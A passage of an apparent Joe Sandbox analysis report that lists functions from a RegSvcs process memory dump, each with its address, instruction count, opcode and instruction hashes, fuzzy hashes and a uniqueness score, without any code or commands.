                                                          • Instruction ID: a3f19dff880579356d24e161a09245fd98cb3287d7238c3646003a87ddc21197
                                                          • Opcode Fuzzy Hash: 322668f9b4c5c6fb762228bbc4a2df8a0204a862b49dbe13d430a693b308533e
                                                          • Instruction Fuzzy Hash: 59018936110219ABCF229E84D840EDA7F66FB4C754F168116FE1866220C336D971EB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0142C0F0 Relevance: .0, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abe0299a07094761020ccf347e1b4d20caa50c4484381c2385958ba68434b124
                                                          • Instruction ID: 89ae9042bf2682483d2d9acb12fc694bbc8b06c4eb662264b723af0c538b627f
                                                          • Opcode Fuzzy Hash: abe0299a07094761020ccf347e1b4d20caa50c4484381c2385958ba68434b124
                                                          • Instruction Fuzzy Hash: 0DF08B312002615BF311910A8C42F773295E7D0251FB5803BE7048B7F1EA71DC818791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146656A Relevance: .0, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8ee3ffc8f69df26c89cf331118136861bba102eef9e9934e20ff535a75f7bf63
                                                          • Instruction ID: cf2c7c2a4a5ffca88bdfb42f5d12a8f6c61c853126bc385cb82362986e44b9fd
                                                          • Opcode Fuzzy Hash: 8ee3ffc8f69df26c89cf331118136861bba102eef9e9934e20ff535a75f7bf63
                                                          • Instruction Fuzzy Hash: 0301A9713006819BF3329B2DDD49F6A37A8BB60B44F8E0556F9018B7F6D778D4028211
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D437C Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                          • Instruction ID: 45fe9bc95af5326406ecff9421402a8ad207db3fddfae44205db26bf29c8dfc6
                                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                          • Instruction Fuzzy Hash: 1CF0E932341A1347EF75AA2E8430B2BA6959FA0910B0D052F9501CBFB0DF30DC118780
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014BE872 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                          • Instruction ID: 81df81fbc5671ccb0562433cc7d280b216e9f1017361ab99d3508a7fd43f55c2
                                                          • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                          • Instruction Fuzzy Hash: 5AF054337119219BE3219E4EDCC0F97B768AFD5A60F19006AA604AB370C770EC0287E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014BC89D Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e90eef787971d8e5a5c1f31df368a3b3710901de969b10bed50283180710a71b
                                                          • Instruction ID: 523a2f66fb3e60825d0b4924b6cad3e6e4122fcda0b6bdd606abcd7dcda89ce1
                                                          • Opcode Fuzzy Hash: e90eef787971d8e5a5c1f31df368a3b3710901de969b10bed50283180710a71b
                                                          • Instruction Fuzzy Hash: 88F08C716053459FD320EF29C881A5AB7E4FFA8710F404A5EB898DB3A4E634E901C796
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01460854 Relevance: .0, Instructions: 35COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                          • Instruction ID: 30d717d54254cb964fe379b7040f4341b8a749bb63860842e3440f39f9002e38
                                                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                          • Instruction Fuzzy Hash: CDF0B472610204AFE724DF26CC01F56B7EDEFA8354F148079A545D7270FAB0ED41C655
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014BC912 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4987efec1d2c311f79229b64b0abd9e04e20287a0316c82f464c2f3ad49f3f2a
                                                          • Instruction ID: fb7ba2060192999cefd15025e78f0cbc9e2c3cdeefcfcf1bb019d515c6309cfa
                                                          • Opcode Fuzzy Hash: 4987efec1d2c311f79229b64b0abd9e04e20287a0316c82f464c2f3ad49f3f2a
                                                          • Instruction Fuzzy Hash: 25F06270A01249DFDB14EF69C595AAEBBB4FF28300F00805AB955EB395DA34EA01CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014347FB Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99e4f597551d09becf94c2f9f4597c3bdfcaa812b720b6c81e4ee27b0071c932
                                                          • Instruction ID: 2dd3ead79d07f3e3c206780033e9e2e4679206e8d78e6778d2018f75b36a6918
                                                          • Opcode Fuzzy Hash: 99e4f597551d09becf94c2f9f4597c3bdfcaa812b720b6c81e4ee27b0071c932
                                                          • Instruction Fuzzy Hash: 7BF0F03D9022D18FE72ACB5CC404BA67BC49B88B20F0C986BC58987672C330D881CA00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014F0115 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8fed09e077447c5bfd361687f50507f44f083f974c55da085ae45d303a48eda6
                                                          • Instruction ID: bbf91eb11f7277424ae6e045870ecec5fb51bbeb1c9712f8eb3a7da2cdfeee73
                                                          • Opcode Fuzzy Hash: 8fed09e077447c5bfd361687f50507f44f083f974c55da085ae45d303a48eda6
                                                          • Instruction Fuzzy Hash: 49F027375166C006CF325F2C66942D22F96A7A7010F1A144FDAB15B327CA768887D720
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146C5ED Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e0aafe111e93b3c61bdb18f93d1ce8b8dadf6596cdfcf72b5b99e1ab3d84a68d
                                                          • Instruction ID: 13b78d7e5f65592da0b700cd107e8aecffec9762c053bb326fad03cd0072ac06
                                                          • Opcode Fuzzy Hash: e0aafe111e93b3c61bdb18f93d1ce8b8dadf6596cdfcf72b5b99e1ab3d84a68d
                                                          • Instruction Fuzzy Hash: 1EF0E9715115519FE322971CC1C4B1277DC9B447A8F08A427D58DC7A72C374FC82C69B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472619 Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                          • Instruction ID: 4fb301dce61f1ed88fa0276c4500bbaf2b8fa08a8a1b5bfd609a37d83ba1b710
                                                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                          • Instruction Fuzzy Hash: 91E092723006412BE7229E5A8C80F87776EAFA2B20F04007FB5045E261C9F29D0982A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014C6030 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                          • Instruction ID: 95aecc45be83fff799cd7ebf2a7b07db42d3e526457ffe8242b3fb935c742f31
                                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                          • Instruction Fuzzy Hash: 52F030B21042049FE321CF4AD944F52B7F8EB15764F56C02AE609AB771D379EC40CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01430710 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                          • Instruction ID: 227b8a0540f215ad7883d84168395736e7cb3aedbf3c739f13203e94f9f68bc7
                                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                          • Instruction Fuzzy Hash: 8BF0E5392043419BEB17DF1AC040A997BE4FB95350F0000AAFC428B321D731E982CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014649D0 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                          • Instruction ID: a8866098f52a87802715b53b5b9c6c88f9cd590e7355b198e03c491a98d86795
                                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                          • Instruction Fuzzy Hash: BAE0D832244145BBDB311E598800F6F77ADDBE0BA8F19042BE2408B670DB70DC41C7E9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01504164 Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3bf2207befac7403ba2f71467c015f2bc73817233d602d4caa7c0e42ec8564ee
                                                          • Instruction ID: c7aaf43ee4bf39259908fa31424fb5bfe126600884d8f65879ebc85d6e02386b
                                                          • Opcode Fuzzy Hash: 3bf2207befac7403ba2f71467c015f2bc73817233d602d4caa7c0e42ec8564ee
                                                          • Instruction Fuzzy Hash: E1F0E531A256914FE773D7ACD540B5D77E0BF10A30F0A0565D5008F992C330EC80C650
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D678E Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                          • Instruction ID: 2d30c4ad159811cad3755f33128c8c0ec3b186179a6e2390b296b00beddcc1ac
                                                          • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                          • Instruction Fuzzy Hash: DEE04872A40114BBDF2197998D15F9B7EACDB64EA4F174056B601D71A0D570DE00D690
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 015008C0 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                          • Instruction ID: 49957da8cddb6cc178bc5fb83c73b349c1254d23e1ec308c643060536aadd0cf
                                                          • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                          • Instruction Fuzzy Hash: 8EE09B316407508BCB26CA9DC141B77B7E8FFD57A0F158069E9454B693D231F942C6D0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014325E0 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 8d5756bc64edf3387e98d5b7600a07a222717835f0b336b5b4d9ea9766e7444c
                                                          • Instruction ID: 703dcc29f838c612a429abc018624381ab8c75912e51c691c78f22498a2a1347
                                                          • Opcode Fuzzy Hash: 8d5756bc64edf3387e98d5b7600a07a222717835f0b336b5b4d9ea9766e7444c
                                                          • Instruction Fuzzy Hash: 73E092321006549BC321BF2ADD01F9A779AEFB4760F01451AF115571A0CA70A910C798
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014EA456 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                          • Instruction ID: 0943627ba9e65b1b3156481dd9ced76409d3201f44fb66e5012e6be12f674d10
                                                          • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                          • Instruction Fuzzy Hash: 1AE01231011651DFE7366F2BD94CB53BAE5FFA0712F248C2FA19A125B0C7B599C1CA41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014B4000 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                          • Instruction ID: 67547343c6cfe0407a9c4873a7a42a05d64f0a8fadd3d434a9cafe4bc856897e
                                                          • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                          • Instruction Fuzzy Hash: 6AE0C2743003058FE715CF19C080BA37BB6BFD5A10F28C069A9498F306EB32E842CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146CA38 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8f8c777ac619744f7ffeefea1f81cdf93a4799a355baa157598f921ed900c5f1
                                                          • Instruction ID: 2badce10c354357cfc65680db3aa77b5c74fc3fcbc0594f32e7af558f1110390
                                                          • Opcode Fuzzy Hash: 8f8c777ac619744f7ffeefea1f81cdf93a4799a355baa157598f921ed900c5f1
                                                          • Instruction Fuzzy Hash: 53D02B325810306BCB75E65A7C44FAB3A5D9B61364F024863F50896131D534CC8192C4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0142823B Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                          • Instruction ID: 08d3b3fde4d7c50e1a6c2b028245e6d4491c364d824fa839d1ac0f6cfbd7fb7f
                                                          • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                          • Instruction Fuzzy Hash: C5E08C32400A32EFDB322F16DC00FAA76E1FB65B10F10482FE081164B487B0A8C2DA68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01432050 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34c1764e6edf402ed64617995fe900abc0053a5050cbe45e84b0a95e4a4e3ba2
                                                          • Instruction ID: 346b349c1f1bd001fe3d5cb8ba26c0eb83775615b21165899f6e78f87fd4d50e
                                                          • Opcode Fuzzy Hash: 34c1764e6edf402ed64617995fe900abc0053a5050cbe45e84b0a95e4a4e3ba2
                                                          • Instruction Fuzzy Hash: AFE08C331005606BC221FE6EDD00F8A739AEFB9660F05012AF1558B6A0CA70AC00C798
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146E59C Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                          • Instruction ID: 782e727cf968f96584a719992c7de56fa23c1d1427f735a1cb5d701a8d5336c8
                                                          • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                          • Instruction Fuzzy Hash: 5DD0A7331045205BD732AA1DFC00FC333D8BB98720F06045AB005C7160C370AC41C644
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014AE908 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                          • Instruction ID: f42f9508a1f142259d5985f525a237db2d3ce83bea60d7bdfe2156290dbe56c1
                                                          • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                          • Instruction Fuzzy Hash: 76E0EC369507849BDF16EF5AC640F5ABBB9BBA4B40F550059A1186B671C634A900CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0142A0E3 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                          • Instruction ID: f25eec055ba8a8daff9f2dfad0b6021697e1ad181e742881a4c2de7ace221455
                                                          • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                          • Instruction Fuzzy Hash: 58D0223321203093DB286A566800F636905AB80AA0F2A002EBC0AD3D20C4288C83C2E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146A830 Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                          • Instruction ID: 23ccff366e979e4d931c3b925ae8544d07944f824d6ef25d5c7fb249ddac460e
                                                          • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                          • Instruction Fuzzy Hash: 9AD012371D055DBBDB11AF66DC01F957BA9E764BA0F444021B504875A0C63AE950D584
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146CA24 Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 88c68b093535e423f1a46c5ac25f704456b7411969e09169c42b1f6e9c561c64
                                                          • Instruction ID: 0a0651557a6bdae4b5b4a48efe7d0409b934059e30a3196740d4106fddf5c58f
                                                          • Opcode Fuzzy Hash: 88c68b093535e423f1a46c5ac25f704456b7411969e09169c42b1f6e9c561c64
                                                          • Instruction Fuzzy Hash: 14D05E315020128BDF26DF09C550A2E3674EB20641B81007EE64191530E334D8018740
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014402A0 Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                          • Instruction ID: 05727502a2f055916c7d16ad73ad8b690c5c12e4bf3586291709d6ea855a5c99
                                                          • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                          • Instruction Fuzzy Hash: 7CD09235212A80CFE61A8B0CC5A4B5633A4BB44A44F850491E501CBB62D678D950CA00
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146C700 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                          • Instruction ID: d72a569293d05b874e3781f9d879d8b5a178c307c6c2e28e52630bccb9223447
                                                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                          • Instruction Fuzzy Hash: F7C01233150644AFD711AE95CD01F0177A9E7A8B40F000021F20447570C531E810D644
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

